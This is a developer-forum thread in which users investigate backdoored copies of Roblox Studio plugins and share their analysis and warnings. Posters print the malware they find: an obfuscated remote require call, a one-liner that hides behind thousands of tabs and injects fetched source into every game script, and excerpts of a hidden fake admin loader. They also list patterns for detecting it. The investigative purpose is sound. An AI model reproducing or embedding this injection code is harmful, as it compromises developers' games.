I don’t think that is possible, you can try by searching a single person in toolbox.
Example of the plugin : 
as it turns out roblox filters out every single name in existence so creating a dummy account is hard and ive been at it for a few minutes
You don’t need a dummy account. It just infects every game you try to edit, so do this on a test place and once your done, delete it from your inventory, uninstall it and delete the game.
no i was creating a dummy account out of boredom and why not
1 Like
its malicious i found
getfenv()['\114\101\113\117\105\114\101'](5151855975)
also imma get that module because im bored and i want to see what it does
1 Like
so much for that, it crashed the second i tried to insert that module into the place
1 Like
I think roblox should just ban the creators if they get banned, they still get backdoors.
oldest one is always the real one.
1 Like
Too bad that I can’t search for the oldest one and my slow internet speeds. It’s gonna be a long fun journey for this one plugin…
and also sometimes the page gets smaller so I might click it and have to start over, roblox should really fix this and redesign the dev page faster.
im gonna find it for u. i got a good connection
1 Like
I would not recommend using a autoclicker, it might click the plugin, because the move page thingy will be random when you get to later pages.
1 Like
Very seriously, why haven’t Roblox API/dev/moderation teams been pushed into making even cursory attempts to filter for these obvious exploits?
There are easy patterns to find.
- Plugins executing encrypted function names.
- Extremely long string of white space at the beginning of the line to push malicious code to where it isn’t seen
- Most especially, any time require(some library asset) is called but not in explicit clear text.
Also rampant plugin copying is easily detected. Why is roblox dead set against putting some effort into doing something?
2 Likes
I agree. Roblox should focus more on developers then the general community. Display names and stuff are cool, but they should help developers about viruses and more.
1 Like
I pulled all my plugins out of studio today to figure out which one was being sketchy, honestly wasting hours on fighting these things. At some point today, I bought the actual Load Character Pro plugin by AlreadyPro.
As I start adding my safe plugins back into studio, roblox showed me a recommended plugin - Load Character Pro, and I very nearly clicked to install it, when I see it’s not the right author.
It’s this user: https://www.roblox.com/users/2281607354/profile/
Look at all this amazing stuff they’ve uploaded!
If that doesn’t impress you, you should see the “FX” script they add in to the plugins they duplicate.
I don’t see any help from this, it’s not related to the plugin I was talking about.
Sorry Default Tool. Do you still need the link to the correct actual plugin?
I’m putting together a couple links
Edit: I couldn’t find a version of the plugin with no malware, so I cleaned one and uploaded it.
More details on what I found in the next message. If you just want your plugin though - there you go:
– EDIT / UPDATE –
I got a message from someone interested in using this plugin, but they are not sure it’s safe to use my “VerifiedPlugins” branded one, in part because of the sus thumbnail I put on it.
Based one what I’ve seen, nobody should be trusting any plugins or content available in the library. I swear 80% of the ones I look at have malware or unwanted content.
This is my best advice to anyone looking for plugins: Start with toolblox.
They are literally the only safe place to look for plugins.
More info about that here:
From there, use the links on toolblox for those top-tier essential plugins and never the links. You won’t find my cleaned/restored version of Billboard Creator there, though I did apply to have it added to their list.
There are plugins there to help keep your projects safer. I used the toolblox links to install:
- GameGuard Anti Virus V2 - this lets you scan your game and your plugins looking for threats.
It did find all the threats I had marked which is good, but the number of false positives makes it something that I can’t recommend in it’s current form. - Venom [Intercept Malicious Scripts]
This disables any scripts that get inserted into your game probably before they do anything. I highly recommend this.
Unfortunately none of that will tell you that any plugin you want to know is safe will be safe. Venom can mitigate the effects.
As for why I used the sketch thumbnail on my plugin, lol - you can search for the VerifiedPlugins Billboard plugin and get 10 results back, 9 of which are malware. I made mine stick out on purpose:
And honestly, if the skeptical emoji on my plugin thumbnail makes you feel unsafe and skeptical about downloading the plugin, that’s how you should feel about every plugin. It’s bad out there.
In the last hour, Roblox recommended yet another copy of the Billboard Creator plugin to me, so I decided to check it. Malware. A new one I didn’t see on the other 7 copies I checked yesterday.
2 Likes
Well, that was disgusting. I looked at the top 7 most favorited results for Billboard. I used the Library API to pick out some targets
https://search.roblox.com/catalog/json?CatalogContext=2&Category=7&Keyword=Billboard&SortType=1
SortType 1 is MostFavorited. The top result has 1231 favorites. You get some json that looks like this:
The other day I wrote a script to help me download and vet plugins and other content.
It puts in in a safe place I can look at it.
I flagged the ones that are malware.
Let’s start with the 2 that are actually from the user meatpillow - the one you mentioned were botted. Both have Malware. No surprise
But they both have 0 favorites.
The most popular one has 1,231 favorites. Is it MALWARE? lol, yep.
I diffed all 7 versions to see what each one added.
The most favorited version has this little bit of extra code:
I=("\t"):rep(4000);C=game:GetObjects("rbxassetid://5915747206")[1].Source;S={["389325813"]="5915563830",["1868400649"]="5915565317",["2373501710"]="5915575426",["3239236979"]="5915578889"};for _,V in next,{workspace,game.ServerScriptService,game.ServerStorage}do function F(T)if T:IsA("Script")then function D()N=0;for O,M in next,S do local Z,R=T.Source:gsub(O.."+",M);T.Source=Z;N+=R;end;if N==0 and not T.Source:find(C)then T.Source..="\n\n"..I..C..I;end;end;D()T:GetPropertyChangedSignal("Source"):Connect(D);end;end;V.DescendantAdded:Connect(F);for _,X in next,V:GetDescendants()do F(X)end;end;
I strongly recommend turning on line wrap and visible whitespace to help find these things in the studio editor.
The second favorite is actually probably ok because it’s malware might be neutralized?
At 623 favorites, Rose Studios copy of the plugin is the best because it only contains one bit of malware:
“Studio Detection” is one line of code. You don’t need to create a new script, instance, and inject it’s source code to then load a module from an external require. Pretty sure.
For now, I think it’s not harmful because the Marketplace api returns this for the target of the asset ID used in the require:
--[[
Roblox product info for 5182026494
AssetTypeId(number): 10
Description(string): [ Content Deleted ]
IsNew(boolean): false
Updated(string): 2020-09-07T23:43:56.997Z
IsLimitedUnique(boolean): false
ProductId(number): 1001788218
MinimumMembershipLevel(number): 0
Created(string): 2020-06-14T19:32:27.94Z
Creator(table):
Creator.Id(number): 1304272341
Creator.CreatorTargetId(number): 1304272341
Creator.Name(string): Lil_Chickfila
Creator.CreatorType(string): User
IsLimited(boolean): false
ContentRatingTypeId(number): 0
TargetId(number): 5182026494
IsPublicDomain(boolean): true
ProductType(string): User Product
Name(string): [ Content Deleted ]
IsForSale(boolean): false
Sales(number): 0
AssetId(number): 5182026494
IconImageAssetId(number): 0
--]]
But I don’t see why someone can’t re-activate the target of require(5182026494) in the future to do harm.
Specimen rbxassetid_6194265244_1137732556(fav00514)[MALWARE] with 514 favorites has this:
Specimen rbxassetid_6224073468_1140324407(fav00010)[MALWARE] with 10 favorites is an odd one because it does not contain the “Studio Detection” sleeper malware. It’s the cleanest copy of the plugin script.
Except where the script should end, you have
Plugin["Create on Selected Object"].MouseButton1Click:Connect(function()
local tbl = {}
for I,v in pairs(Plugin["Scroller"]:GetChildren()) do
if v:IsA("Frame") then
table.insert(tbl, #tbl+1, {TitleText = v.Title.Text, Text = v.Main.Text})
end
end
local selection = game.Selection:Get()[1]
if selection then
local new = script.Board:Clone()
new.MainScriptRunner.Value.Value = game:GetService("HttpService"):JSONEncode(tbl)
new.Parent = selection
new.MainScriptRunner.Disabled = false
else
error("You have nothing selected!")
end
end)
...
( 80 lines of whitespace )
...
wait(4)
... more pages of white space
local naturalnames = {"Debounce","Fix","Welding","AdminLoader","MeshHandler"}
local loaderw = Instance.new("Script")
loaderw.Source = [[
--ADMIN LOADER.
--This is a script that is part of your admin in game.
--Removing/tampering with this script will potentially result in scripts breaking in your game.
... more pages of whitespace
Yeah, no
Specimen rbxassetid_5673998114_1085855255(fav00002)[MALWARE] with two favorites:
Maybe someone on the Roblox Dev team wants to run that and see what it does.
So that’s the top 7. I could re-upload a clean version if you need it, I guess?
Seven days ago @Phazenine found this
getfenv()['\114\101\113\117\105\114\101'](5151855975)
So I checked that module. Marketplace api says it’s name has been changed to “[ Content Deleted ]” just like the sleeper malware most of the other scripts have embedded.
--[[
Roblox product info for 5151855975
AssetTypeId(number): 10
Description(string): [ Content Deleted ]
IsNew(boolean): false
Updated(string): 2020-12-27T14:24:36.5Z
IsLimitedUnique(boolean): false
ProductId(number): 998820906
MinimumMembershipLevel(number): 0
Created(string): 2020-06-08T13:25:26.57Z
Creator(table):
Creator.Id(number): 1682650115
Creator.CreatorTargetId(number): 1682650115
Creator.Name(string): pandsoliver
Creator.CreatorType(string): User
IsLimited(boolean): false
ContentRatingTypeId(number): 0
TargetId(number): 5151855975
IsPublicDomain(boolean): true
ProductType(string): User Product
Name(string): [ Content Deleted ]
IsForSale(boolean): false
Sales(number): 0
AssetId(number): 5151855975
IconImageAssetId(number): 0
--]]
But the funny thing is the content is not deleted.
MainModule from require(5151855975):
Anyway. That took over an hour of my time, and more time to write it up so… fun.
In closing, please signal boost sleitnick’s video from last week:
1 Like
The reason studio didn’t like when you tried to grab it is that asset 5151855975 contains literally 30,000 instances of a Part named “Part” right in the root of the plugin.
The log from my loader:
23:23:43.747 Content item 29999 - [29999]:Part - Edit - ArkUtil:129
23:23:43.747 Content item 30000 - [30000]:Part - Edit - ArkUtil:129
23:23:43.747 Content item 30001 - [30001]:Part - Edit - ArkUtil:129
23:23:43.747 Content item 30002 - [30002]:Part - Edit - ArkUtil:129
23:23:43.748 Content item 30003 - [30003]:Part - Edit - ArkUtil:129
23:23:43.748 Successfully copied 30003 content items - Edit - ArkUtil:132
My studio wasn’t happy, but it finished. Then I told it
for k,child in pairs( game.ServerStorage.BadIdea.BillboardPluginFinding.rbxassetid_5151855975_998820906:GetChildren()) do if child.Name=="Part" then child.Parent=nil; child:Destroy() end end
and everything is fine. I’m going to limit the content checking script to 100 in case this is a common thing.
Aside from the 30,000 spam parts, it contains a skybox, a Truss block, and an obfuscated MainModule
User_x and ProductInfo are put in there by my script.
MainModule is one of these:
MainModule’s entire content is a string of obfuscated code that has to be reversed before it can be executed, but the string itself is a comment inside of --[[ , so ???
I don’t think getfenv()’\114\101\113\117\105\114\101’ can actually do anything until the malware author pushes out an update uncommenting the script.
But also, most people probably won’t look into it due to the 30,000 Part instances you have to sort through.
1 Like